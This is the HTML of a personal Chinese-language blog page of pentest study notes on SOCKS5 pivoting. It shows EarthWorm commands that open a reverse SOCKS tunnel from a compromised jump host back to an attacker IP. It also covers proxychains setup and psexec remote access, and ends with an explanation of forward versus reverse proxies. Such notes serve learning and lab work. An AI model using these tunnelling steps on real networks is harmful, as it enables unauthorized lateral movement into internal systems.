<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="generator" content="VuePress 2.0.0-rc.0">
    <style>
      :root {
        --c-bg: #fff;
      }
      html.dark {
        --c-bg: #22272e;
      }
      html, body {
        background-color: var(--c-bg);
      }
    </style>
    <script>
      const userMode = localStorage.getItem('vuepress-color-scheme');
			const systemDarkMode = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches;
			if (userMode === 'dark' || (userMode !== 'light' && systemDarkMode)) {
				document.documentElement.classList.toggle('dark', true);
			}
    </script>
    <style>
          body {
            background-image: url('/bg.png');
            background-repeat: no-repeat;
            background-attachment: fixed;
            background-size: cover;
          }
        </style><title>Welcome to Five_Three's page!</title><meta name="description" content="个人博客">
    <link rel="preload" href="/assets/style-pBmjJHNx.css" as="style"><link rel="stylesheet" href="/assets/style-pBmjJHNx.css">
    <link rel="modulepreload" href="/assets/app-K9ada_Hb.js"><link rel="modulepreload" href="/assets/socks5.html-kr9Ffpt1.js"><link rel="modulepreload" href="/assets/socks5.html-Z3ARl3ZI.js">
    <link rel="prefetch" href="/assets/index.html-Cgvqf9KF.js" as="script"><link rel="prefetch" href="/assets/ARP协议思考.html-K_Ksl8nB.js" as="script"><link rel="prefetch" href="/assets/Cobalt Strike常用命令.html-NP4dNU-v.js" as="script"><link rel="prefetch" href="/assets/GFW研究.html-VOa58uJO.js" as="script"><link rel="prefetch" href="/assets/Github博客搭建.html-r_ysFl3H.js" as="script"><link rel="prefetch" href="/assets/fscan基本使用.html-qeLLO_fy.js" as="script"><link rel="prefetch" href="/assets/git配置.html--yb9zucP.js" as="script"><link rel="prefetch" href="/assets/wireshark常用语法.html-_1m5abIg.js" as="script"><link rel="prefetch" href="/assets/路由表配置.html-XADuF8Kh.js" as="script"><link rel="prefetch" href="/assets/404.html-6Yl8cQE3.js" as="script"><link rel="prefetch" href="/assets/index.html-dy68rugw.js" as="script"><link rel="prefetch" href="/assets/ARP协议思考.html-3RT3mrIc.js" as="script"><link rel="prefetch" href="/assets/Cobalt Strike常用命令.html-JWctp7xW.js" as="script"><link rel="prefetch" href="/assets/GFW研究.html-X1t8cXts.js" as="script"><link rel="prefetch" href="/assets/Github博客搭建.html-bCggHPAH.js" as="script"><link rel="prefetch" href="/assets/fscan基本使用.html-zO10if8o.js" as="script"><link rel="prefetch" href="/assets/git配置.html-QLjSddiv.js" as="script"><link rel="prefetch" href="/assets/wireshark常用语法.html-zbraLUAH.js" as="script"><link rel="prefetch" href="/assets/路由表配置.html-j_IiSy9n.js" as="script"><link rel="prefetch" href="/assets/404.html-7_Z1FPwt.js" as="script">
  </head>
  <body>
    <div id="app"><!--[--><div class="theme-container"><!--[--><header class="navbar"><div class="toggle-sidebar-button" title="toggle sidebar" aria-expanded="false" role="button" tabindex="0"><div class="icon" aria-hidden="true"><span></span><span></span><span></span></div></div><span><a href="/" class=""><!----><span class="site-name">Welcome to Five_Three&#39;s page!</span></a></span><div class="navbar-items-wrapper" style=""><!--[--><!--]--><!----><!--[--><!--]--><button class="toggle-color-mode-button" title="toggle color mode"><svg style="" class="icon" focusable="false" viewBox="0 0 32 32"><path d="M16 12.005a4 4 0 1 1-4 4a4.005 4.005 0 0 1 4-4m0-2a6 6 0 1 0 6 6a6 6 0 0 0-6-6z" fill="currentColor"></path><path d="M5.394 6.813l1.414-1.415l3.506 3.506L8.9 10.318z" fill="currentColor"></path><path d="M2 15.005h5v2H2z" fill="currentColor"></path><path d="M5.394 25.197L8.9 21.691l1.414 1.415l-3.506 3.505z" fill="currentColor"></path><path d="M15 25.005h2v5h-2z" fill="currentColor"></path><path d="M21.687 23.106l1.414-1.415l3.506 3.506l-1.414 1.414z" fill="currentColor"></path><path d="M25 15.005h5v2h-5z" fill="currentColor"></path><path d="M21.687 8.904l3.506-3.506l1.414 1.415l-3.506 3.505z" fill="currentColor"></path><path d="M15 2.005h2v5h-2z" fill="currentColor"></path></svg><svg style="display:none;" class="icon" focusable="false" viewBox="0 0 32 32"><path d="M13.502 5.414a15.075 15.075 0 0 0 11.594 18.194a11.113 11.113 0 0 1-7.975 3.39c-.138 0-.278.005-.418 0a11.094 11.094 0 0 1-3.2-21.584M14.98 3a1.002 1.002 0 0 0-.175.016a13.096 13.096 0 0 0 1.825 25.981c.164.006.328 0 .49 0a13.072 13.072 0 0 0 10.703-5.555a1.01 1.01 0 0 0-.783-1.565A13.08 13.08 0 0 1 15.89 4.38A1.015 1.015 0 0 0 14.98 3z" fill="currentColor"></path></svg></button><!----></div></header><!--]--><div class="sidebar-mask"></div><!--[--><aside class="sidebar"><!----><!--[--><!--]--><ul class="sidebar-items"><!--[--><li><p tabindex="0" class="sidebar-item sidebar-heading"> <!----></p><ul style="" class="sidebar-item-children"><!--[--><li><a aria-current="page" href="/docs/socks5.html#socks5" class="router-link-active router-link-exact-active sidebar-item" aria-label="socks5"><!--[--><!--]--> socks5 <!--[--><!--]--></a><!----></li><!--]--></ul></li><!--]--></ul><!--[--><!--]--></aside><!--]--><!--[--><main class="page"><!--[--><!--]--><div class="theme-default-content"><!--[--><!--]--><div><h3 id="socks5" tabindex="-1"><a class="header-anchor" href="#socks5" aria-hidden="true">#</a> socks5</h3><blockquote><p><a href="https://www.cnblogs.com/kuangke/p/11133693.html" target="_blank" rel="noopener noreferrer">通过SOCKS代理渗透整个内网 - 狂客 - 博客园 (cnblogs.com)<span><svg class="external-link-icon" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path><polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg><span class="external-link-icon-sr-only">open in new window</span></span></a></p></blockquote><p><img src="/assets/v2-afbc489aacfa5fc50163e515cc281cbd_720w-vKOJH0Dv.webp" alt="img"></p><p>四步走</p><ol><li>攻陷一台跳板机</li><li>kali上添加一个转接隧道，把本地1080端口收到的代理请求转交给1234端口。</li><li>web服务器上启动SOCKS5服务，并反弹到kali的1234端口上。</li><li>配置proxychains.conf /etc/proxychains.conf 去掉dynamic_chain的注释 添加代理socks5 127.0.0.1 1080</li></ol><blockquote><p><a href="https://cloud.tencent.com/developer/article/1418457" target="_blank" rel="noopener noreferrer">终于有人把正向代理和反向代理解释的明明白白了！-腾讯云开发者社区-腾讯云 (tencent.com)<span><svg class="external-link-icon" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path><polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg><span class="external-link-icon-sr-only">open in new window</span></span></a></p></blockquote><blockquote><p>工具：<strong>EarthWorm</strong></p><p><a href="https://github.com/idlefire/ew" target="_blank" rel="noopener noreferrer">idlefire/ew: 内网穿透(跨平台) (github.com)<span><svg class="external-link-icon" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path><polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg><span class="external-link-icon-sr-only">open in new window</span></span></a></p><p>proxychains_win</p><p><a href="https://www.xiazhanjian.com/archives/proxychainsforwindows.html" target="_blank" rel="noopener noreferrer">proxychains for windows 用法 - 下站见 (xiazhanjian.com)<span><svg class="external-link-icon" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path><polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg><span class="external-link-icon-sr-only">open in new window</span></span></a></p><p><a href="https://www.freebuf.com/sectool/259634.html" target="_blank" rel="noopener noreferrer">EarthWorm(ew)使用教程 - FreeBuf网络安全行业门户<span><svg class="external-link-icon" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path><polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg><span class="external-link-icon-sr-only">open in new window</span></span></a></p><p><a href="https://www.freebuf.com/sectool/234254.html" target="_blank" rel="noopener noreferrer">内网渗透：使用ew实现socks代理 - FreeBuf网络安全行业门户<span><svg class="external-link-icon" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path><polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg><span class="external-link-icon-sr-only">open in new window</span></span></a></p></blockquote><p>一次具体实施（似乎不太对）:</p><p>1.在win10攻击机上运行：</p><div class="language-text line-numbers-mode" data-ext="text"><pre class="language-text"><code>ew_for_Win -s rcsocks -l 1080 -e 1234
</code></pre><div class="line-numbers" aria-hidden="true"><div class="line-number"></div></div></div><p>添加一个转接隧道，把本地1080端口收到的代理请求转交给1234端口</p><p>2.在攻陷的跳板机上：</p><div class="language-text line-numbers-mode" data-ext="text"><pre class="language-text"><code>ew_for_Win -s rssocks -d 100.1.1.101 -e 1234
</code></pre><div class="line-numbers" aria-hidden="true"><div class="line-number"></div></div></div><p>跳板机上启动SOCKS5服务，并反弹到IP地址为100.1.1.101（攻击机）的1234端口上。</p><p>3.攻击机启动proxychains：</p><p><img src="/assets/image-20231219113111060-NDS2kFSX.png" alt="image-20231219113111060"></p><p>使用psexec进行远程连接</p><p><img src="/assets/image-20231219135236653-7CfzHuTv.png" alt="image-20231219135236653"></p><p>代理与反向代理：</p><p><img src="/assets/image-20231219092416652-0h1uiCwM.png" alt="image-20231219092416652"></p><p><strong>正向代理（forward proxy）：是一个位于客户端和目标服务器之间的服务器(代理服务器)，为了从目标服务器取得内容，客户端向代理服务器发送一个请求并指定目标，然后代理服务器向目标服务器转交请求并将获得的内容返回给客户端。</strong></p><p><strong>所以，正向代理，其实是&quot;代理服务器&quot;代理了&quot;客户端&quot;，去和&quot;目标服务器&quot;进行交互。</strong></p><p>目标服务器是不知道真正的客户端是谁的</p><p><img src="/assets/image-20231219092429780-Kt2Dx3AX.png" alt="image-20231219092429780"></p><p><strong>反向代理：是指以代理服务器来接受internet上的连接请求，然后将请求转发给内部网络上的服务器，并将从服务器上得到的结果返回给internet上请求连接的客户端，此时代理服务器对外就表现为一个反向代理服务器。</strong></p><p><strong>所以，反向代理，其实是&quot;代理服务器&quot;代理了&quot;目标服务器&quot;，去和&quot;客户端&quot;进行交互。</strong></p><p>客户端是不知道真正的目标服务器是谁的</p><h4 id="正向代理和反向代理的区别" tabindex="-1"><a class="header-anchor" href="#正向代理和反向代理的区别" aria-hidden="true">#</a> <strong>正向代理和反向代理的区别</strong></h4><p>虽然正向代理服务器和反向代理服务器所处的位置都是客户端和真实服务器之间，所做的事情也都是把客户端的请求转发给服务器，再把服务器的响应转发给客户端，但是二者之间还是有一定的差异的。</p><p>1、<strong>正向代理其实是客户端的代理</strong>，帮助客户端访问其无法访问的服务器资源。<strong>反向代理则是服务器的代理</strong>，帮助服务器做负载均衡，安全防护等。</p><p>2、<strong>正向代理一般是客户端架设的</strong>，比如在自己的机器上安装一个代理软件。而<strong>反向代理一般是服务器架设的</strong>，比如在自己的机器集群中部署一个反向代理服务器。</p><p>3、<strong>正向代理中，服务器不知道真正的客户端到底是谁</strong>，以为访问自己的就是真实的客户端。而在<strong>反向代理中，客户端不知道真正的服务器是谁</strong>，以为自己访问的就是真实的服务器。</p><p>4、正向代理和反向代理的作用和目的不同。<strong>正向代理主要是用来解决访问限制问题。而反向代理则是提供负载均衡、安全防护等作用。二者均能提高访问速度。</strong></p></div><!--[--><!--]--></div><footer class="page-meta"><!----><div class="meta-item last-updated"><span class="meta-item-label">Last Updated: </span><!----></div><div class="meta-item contributors"><span class="meta-item-label">Contributors: </span><span class="meta-item-info"><!--[--><!--[--><span class="contributor" title="email: zjdwsxy@163.com">five-three</span><!----><!--]--><!--]--></span></div></footer><!----><!--[--><!--]--></main><!--]--></div><!----><!--]--></div>
    <script type="module" src="/assets/app-K9ada_Hb.js" defer></script>
  </body>
</html>
